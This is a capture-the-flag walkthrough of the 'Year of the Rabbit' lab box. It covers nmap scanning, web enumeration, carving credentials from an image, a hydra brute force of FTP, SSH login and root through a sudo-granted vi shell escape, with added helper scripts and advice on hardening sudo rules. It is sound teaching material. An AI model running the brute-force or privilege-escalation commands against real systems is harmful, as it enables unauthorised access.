Year of the Rabbit
Reconnaissance
Initial nmap scan to find open ports, using the "treat all hosts as alive" flag (-Pn). This skips host discovery, so the scan still runs if the target drops ping probes instead of reporting the host as down.
Detailed nmap scan:
Command breakdown:
(-sV): service and version detection on the open ports
(-sC): run nmap's default script set (the same as --script=default)
(-p): scan only ports 21,22,80, the ones the initial sweep found
(-oN nmap): save the output in normal, human-readable format to a file called nmap
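The two scans rebuilt from the flag breakdown, plus a small parser for the saved -oN file, as an added example that is not part of the original writeup. The target address is a placeholder, and the nmap output fed to the parser is a constructed sample whose service banners are illustrative, not a capture from the box.

```sh
#!/bin/sh
# Added example, not from the original writeup: the two scans above rebuilt
# from the flag breakdown, plus a parser for the -oN file. TARGET is a
# placeholder (assumption); substitute the box's address.
TARGET="${TARGET:-10.10.10.10}"

# Initial sweep. -Pn skips host discovery, so a target that drops ICMP
# echo requests is still port-scanned instead of being reported as down.
initial_scan() {
    nmap -Pn "$TARGET"
}

# Detailed scan of the ports the sweep turned up: version detection (-sV),
# the default NSE script set (-sC), only ports 21,22,80 (-p) and normal
# output saved to a file called nmap (-oN).
detailed_scan() {
    nmap -sV -sC -p 21,22,80 -oN nmap "$TARGET"
}

# Constructed sample of a -oN file so the parser can be exercised offline.
# The banners are illustrative, not a capture from the box.
write_sample_nmap() {
    f=$(mktemp)
    cat > "$f" <<'EOF'
# Nmap scan initiated as: nmap -sV -sC -p 21,22,80 -oN nmap 10.10.10.10
Nmap scan report for 10.10.10.10
Host is up (0.045s latency).

PORT   STATE  SERVICE VERSION
21/tcp open   ftp     vsftpd
22/tcp open   ssh     OpenSSH (protocol 2.0)
80/tcp open   http    Apache httpd
Service Info: OS: Linux
# Nmap done -- 1 IP address (1 host up) scanned in 12.34 seconds
EOF
    printf '%s\n' "$f"
}

# Open port numbers from a -oN file, space separated. Port rows have
# "open" in the second column and "port/proto" in the first; the header
# row and the comment lines never match.
open_ports() {
    awk '$2 == "open" { split($1, p, "/"); printf "%s ", p[1] }' "$1" | sed 's/ $//'
}

# Service name for one port, handy for deciding what to enumerate next.
service_on() {
    awk -v port="$2/tcp" '$1 == port && $2 == "open" { print $3 }' "$1"
}

# Demo on the constructed sample; the real scans need a live target.
sample=$(write_sample_nmap)
echo "open ports: $(open_ports "$sample")"
echo "port 80 runs: $(service_on "$sample" 80)"
rm -f "$sample"
```

The port list passed to -p in the detailed scan is exactly what open_ports would print for the sweep output, so the second scan only spends time on services that are actually listening.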
Enumeration
Let's visit the web server.
It's the Apache2 default page, so let's run gobuster to find hidden directories and pages.
We found a directory called /assets; let's visit it.
There are two files. Let's check the first one, an mp4 video file. First we get a message telling us to turn off JavaScript, followed by a redirection to a Rick Astley video. Rickrolled!
Let's turn off JavaScript: navigate to about:config in the browser (Firefox's settings page), search for javascript, and set the javascript.enabled parameter to false.
Looking at the other file, we see something interesting. Let's visit this page.
Listening to the audio, at second 56 we get the hint: "I'll put you out of your misery burp you're looking in the wrong place." They are probably hinting at Burp Suite, so let's use it.
Let's intercept the request for this page in Burp. After forwarding the request once, the response that the browser would otherwise follow straight through contains something interesting:
It's a directory, so let's visit it.
There is one file; let's check it out.
It's a picture. Let's use our steganography skills to see if anything is hidden in it. First we need to download the file.
Now let's run steghide and binwalk against the image to see if either finds anything embedded. Neither found anything, so I just ran strings on the image.
Scrolling up a bit through the strings output, there is something interesting:
So we have a username and a password list. Let's copy the password list to a file (I saved it as passwords.lst) and use hydra to brute-force FTP with that username and list.
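The strings, wordlist and hydra steps as an added example that is not part of the original writeup. It rebuilds what strings(1) does from tr and grep so the carving can be run anywhere, and the image it carves is a constructed stand-in: the username and passwords inside it are invented for the demo, not the box's real credentials.

```sh
#!/bin/sh
# Added example, not from the original writeup: what strings(1) does,
# rebuilt from tr and grep so it runs anywhere, then the wordlist and
# hydra steps. The sample image, username and passwords below are
# constructed stand-ins, not the box's real values.

# strings(1)'s default behaviour: keep runs of 4 or more printable
# characters. Every non-printable byte becomes a line break, then short
# fragments are dropped. LC_ALL=C makes high bytes non-printable instead
# of being read as pieces of multibyte characters.
carve_strings() {
    LC_ALL=C tr -c '[:print:]\n' '\n' < "$1" | grep -E '^.{4,}$'
}

# Turn the carved strings into a wordlist: dedupe, drop anything too
# short or too long to be a plausible password, one entry per line.
# Prints the number of candidates written.
make_wordlist() {
    carve_strings "$1" | awk 'length($0) >= 4 && length($0) <= 64' | sort -u > "$2"
    wc -l < "$2" | tr -d ' '
}

# Brute-force FTP with one username and the wordlist. -t 4 keeps the
# parallelism low; some FTP daemons throttle or ban aggressive clients.
# Not run in the demo: it needs the live target.
brute_ftp() {
    hydra -l "$1" -P "$2" -t 4 "ftp://$3"
}

# Constructed stand-in for the downloaded image: binary junk with a
# username and a few passwords embedded, written with printf so the
# bytes are exact.
write_sample_image() {
    f=$(mktemp)
    printf 'PNGJUNK\001\002\003someuser\000\377pass-one\npass-two\n\004\005ab\006' > "$f"
    printf '%s\n' "$f"
}

# Demo: carve the sample and build the list. The writeup copies just the
# password block out of the strings output by hand; this automatic
# version keeps every printable run, so the username and some junk
# ("PNGJUNK") land in the list too. That costs a few extra attempts,
# nothing more.
img=$(write_sample_image)
list=$(mktemp)
echo "wrote $(make_wordlist "$img" "$list") candidates:"
cat "$list"
rm -f "$img" "$list"
```

brute_ftp is the hydra invocation for the real target: one fixed login (-l), the list as the password source (-P), and the ftp:// target spec. Keep the thread count low on FTP; a banned source address ends the exercise early.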
Exploitation
Hydra found the password, so let's log in over FTP.
We are logged in; let's list the files.
There is a text file; let's transfer it to our machine.
Let's read the file.
I don't understand this code, so let's put it in a tool that does.
Now we have a password; let's use it to log in over SSH with the username we found earlier.
We are logged in and greeted with a message. We can find the user flag here, but we are not allowed to read it, so we have to escalate privileges. The login message says there is a leet s3cr3t hiding place with a hidden message waiting for us, so let's find it with this command.
It's a directory, so let's change into it, list its contents and read the file it holds.
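Locating the hiding place and the hidden file inside it, as an added example that is not part of the original writeup. The search terms come from the login banner's spelling ("s3cr3t"); the directory tree it runs over is a constructed stand-in built in a temp directory, not the box's real layout. On the target the same functions would be run against / instead.

```sh
#!/bin/sh
# Added example, not from the original writeup: locating a directory whose
# name is written in leetspeak, then listing the hidden files inside it.
# The tree built below is a constructed stand-in for the target's
# filesystem; on the box the search root would be /.

# Directories under $1 whose name contains secret/s3cr3t (any case).
# stderr is dropped because a low-privilege user gets "Permission denied"
# on most of the filesystem, which would otherwise bury the hit.
find_secret_dirs() {
    find "$1" -type d \( -iname '*s3cr3t*' -o -iname '*secret*' \) 2>/dev/null
}

# Hidden files (dotfiles) directly inside a directory. A plain ls hides
# them, which is why a message "waiting for us" is easy to walk past;
# ls -la or this find shows them.
hidden_files() {
    find "$1" -maxdepth 1 -name '.*' -type f 2>/dev/null
}

# Constructed stand-in tree: one leet-named directory holding a dotfile,
# plus an ordinary directory that must not match.
build_sample_tree() {
    t=$(mktemp -d)
    mkdir -p "$t/opt/s3cr3t" "$t/home/user/Documents"
    printf 'a hidden message\n' > "$t/opt/s3cr3t/.note"
    printf 'nothing here\n' > "$t/home/user/Documents/readme"
    printf '%s\n' "$t"
}

# Demo on the sample tree. Word-splitting the find output is fine here
# because the constructed paths contain no spaces.
root=$(build_sample_tree)
for d in $(find_secret_dirs "$root"); do
    echo "dir: $d"
    for f in $(hidden_files "$d"); do
        echo "hidden file: $f"
        cat "$f"
    done
done
rm -rf "$root"
```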
Looks like we have the password for the user Gwendoline, so let's switch users with su. We can now read the user.txt file.
Privilege Escalation
Let's run sudo -l to see what this user can run as root.
Looks like we can run /usr/bin/vi /home/gwendoline/user.txt as root. I found this article that explains very well what to do. First we use this command:
And then we use this command
And you are now root.
We can read the root flag.
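Why that sudo rule is a straight path to root, as an added example that is not part of the original writeup. The sudo -l text below is a constructed stand-in shaped like real output and carrying the rule the writeup reports (the hostname is a placeholder); the filter picks out allowed commands that can spawn a shell from inside, and the comment at the end shows the usual vi escape, which is the generic technique and not necessarily the exact commands from the article the writeup links.

```sh
#!/bin/sh
# Added example, not from the original writeup: reading sudo -l output
# for rules that hand over an interactive program. The text below is a
# constructed stand-in shaped like real sudo -l output, with the rule
# the writeup reports; "target" is a placeholder hostname.
SUDO_L_SAMPLE='Matching Defaults entries for gwendoline on target:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User gwendoline may run the following commands on target:
    (ALL) /usr/bin/vi /home/gwendoline/user.txt'

# Rule lines look like "(RUNAS) [NOPASSWD:] /path/to/cmd args"; print
# just the command path from each one. Defaults lines never start with
# a parenthesised run-as spec, so they fall through.
sudo_commands() {
    sed -n 's/^[[:space:]]*([^)]*)[[:space:]]*\(NOPASSWD:[[:space:]]*\)\{0,1\}\([^[:space:]][^[:space:]]*\).*/\2/p'
}

# Keep the commands that can start a shell from inside (a short cut of
# the GTFOBins list). Any of these running as root is full root,
# whatever file argument the rule pins.
shell_escape_capable() {
    while IFS= read -r cmd; do
        case "$(basename "$cmd")" in
            vi|vim|vim.basic|view|nano|less|more|man|awk|find|perl|python|python3)
                printf '%s\n' "$cmd" ;;
        esac
    done
}

# Feed saved sudo -l output through both filters.
check_sudo_rules() {
    printf '%s\n' "$1" | sudo_commands | shell_escape_capable
}

# Getting root from the rule, typed on the target (not run here):
#   sudo /usr/bin/vi /home/gwendoline/user.txt
#   :!/bin/bash          inside vi: runs a shell as the user vi runs as
#   :set shell=/bin/sh   alternative: point vi's shell at sh,
#   :shell               then drop into it

echo "shell-capable sudo rules:"
check_sudo_rules "$SUDO_L_SAMPLE"
```

The defensive reading: a sudo rule that grants an editor, pager or interpreter is a grant of root, no matter how narrow the file argument looks. If the intent is "let this user edit one file as root", sudoedit does that by editing a temporary copy as the user and only copying it back as root; sudo's NOEXEC tag is the other mitigation, since it stops the editor from executing anything, which is exactly the :! escape above.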